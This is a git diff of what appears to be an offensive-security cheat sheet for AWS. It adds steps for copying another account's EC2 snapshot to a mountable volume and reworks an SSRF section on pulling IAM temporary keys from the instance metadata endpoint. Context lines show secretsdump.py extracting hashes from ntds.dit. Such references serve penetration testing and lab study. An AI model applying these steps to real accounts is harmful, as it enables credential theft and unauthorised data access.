EC2 Snapshots
parent
978e8b336b
commit
255aaec399
|
@ -73,6 +73,31 @@ aws ec2 terminate-instances --instance-id "i-0546910a0c18725a1" --region eu-west
|
||||||
14. locally run `"secretsdump.py -system ./SYSTEM -ntds ./ntds.dit local -outputfile secrets'`, expects secretsdump to be on path
|
14. locally run `"secretsdump.py -system ./SYSTEM -ntds ./ntds.dit local -outputfile secrets'`, expects secretsdump to be on path
|
||||||
|
|
||||||
|
|
||||||
|
## Access Snapshots
|
||||||
|
|
||||||
|
1. Get the `owner-id`
|
||||||
|
```powershell
|
||||||
|
$ aws --profile flaws sts get-caller-identity
|
||||||
|
"Account": "XXXX26262029",
|
||||||
|
```
|
||||||
|
2. List snapshots
|
||||||
|
```powershell
|
||||||
|
$ aws --profile flaws ec2 describe-snapshots --owner-id XXXX26262029 --region us-west-2
|
||||||
|
"SnapshotId": "snap-XXXX342abd1bdcb89",
|
||||||
|
```
|
||||||
|
3. Create a volume using the previously obtained `snapshotId`
|
||||||
|
```powershell
|
||||||
|
$ aws --profile swk ec2 create-volume --availability-zone us-west-2a --region us-west-2 --snapshot-id snap-XXXX342abd1bdcb89
|
||||||
|
```
|
||||||
|
4. In AWS console, deploy a new EC2 Ubuntu based, attach the volume and then mount it on the machine.
|
||||||
|
```ps1
|
||||||
|
$ ssh -i YOUR_KEY.pem ubuntu@ec2-XXX-XXX-XXX-XXX.us-east-2.compute.amazonaws.com
|
||||||
|
$ lsblk
|
||||||
|
$ sudo file -s /dev/xvda1
|
||||||
|
$ sudo mount /dev/xvda1 /mnt
|
||||||
|
```
|
||||||
|
|
||||||
|
|
||||||
## Instance Connect
|
## Instance Connect
|
||||||
|
|
||||||
Push an SSH key to EC2 instance
|
Push an SSH key to EC2 instance
|
||||||
|
|
|
@ -15,9 +15,9 @@ curl -H "X-aws-ec2-metadata-token:$TOKEN" -v "http://169.254.169.254/latest/meta
|
||||||
|
|
||||||
## Method for Elastic Cloud Compute (EC2)
|
## Method for Elastic Cloud Compute (EC2)
|
||||||
|
|
||||||
Example : https://awesomeapp.com/forward?target=http://169.254.169.254/latest/meta-data/iam/security-credentials/Awesome-WAF-Role/
|
Amazon provides an internal service that allows every EC2 instance to query and retrieve metadata about the host. If you discover an SSRF vulnerability running on an EC2 instance, try to fetch the content from 169.254.169.254.
|
||||||
|
|
||||||
1. Access the IAM : https://awesomeapp.com/forward?target=http://169.254.169.254/latest/meta-data/
|
1. Access the IAM : [http://169.254.169.254/latest/meta-data/](http://169.254.169.254/latest/meta-data/)
|
||||||
```powershell
|
```powershell
|
||||||
ami-id
|
ami-id
|
||||||
ami-launch-index
|
ami-launch-index
|
||||||
|
@ -30,8 +30,8 @@ Example : https://awesomeapp.com/forward?target=http://169.254.169.254/latest/me
|
||||||
instance-action
|
instance-action
|
||||||
instance-id
|
instance-id
|
||||||
```
|
```
|
||||||
2. Find the name of the role assigned to the instance : https://awesomeapp.com/forward?target=http://169.254.169.254/latest/meta-data/iam/security-credentials/
|
2. Find the name of the role assigned to the instance : [http://169.254.169.254/latest/meta-data/iam/security-credentials/](http://169.254.169.254/latest/meta-data/iam/security-credentials/)
|
||||||
3. Extract the role's temporary keys : https://awesomeapp.com/forward?target=http://169.254.169.254/latest/meta-data/iam/security-credentials/Awesome-WAF-Role/
|
3. Extract the role's temporary keys : [http://169.254.169.254/latest/meta-data/iam/security-credentials/<IAM_USER_ROLE_HERE>/](http://169.254.169.254/latest/meta-data/iam/security-credentials/<IAM_USER_ROLE_HERE>/)
|
||||||
```powershell
|
```powershell
|
||||||
{
|
{
|
||||||
"Code" : "Success",
|
"Code" : "Success",
|
||||||
|
@ -69,7 +69,7 @@ Example : https://awesomeapp.com/forward?target=http://169.254.169.254/latest/me
|
||||||
|
|
||||||
## AWS API calls that return credentials
|
## AWS API calls that return credentials
|
||||||
|
|
||||||
- chime:createapikey
|
- [chime:createapikey](https://docs.aws.amazon.com/service-authorization/latest/reference/list_amazonchime.html)
|
||||||
- [codepipeline:pollforjobs](https://docs.aws.amazon.com/codepipeline/latest/APIReference/API_PollForJobs.html)
|
- [codepipeline:pollforjobs](https://docs.aws.amazon.com/codepipeline/latest/APIReference/API_PollForJobs.html)
|
||||||
- [cognito-identity:getopenidtoken](https://docs.aws.amazon.com/cognitoidentity/latest/APIReference/API_GetOpenIdToken.html)
|
- [cognito-identity:getopenidtoken](https://docs.aws.amazon.com/cognitoidentity/latest/APIReference/API_GetOpenIdToken.html)
|
||||||
- [cognito-identity:getopenidtokenfordeveloperidentity](https://docs.aws.amazon.com/cognitoidentity/latest/APIReference/API_GetOpenIdTokenForDeveloperIdentity.html)
|
- [cognito-identity:getopenidtokenfordeveloperidentity](https://docs.aws.amazon.com/cognitoidentity/latest/APIReference/API_GetOpenIdTokenForDeveloperIdentity.html)
|
||||||
|
|
Loading…
Reference in New Issue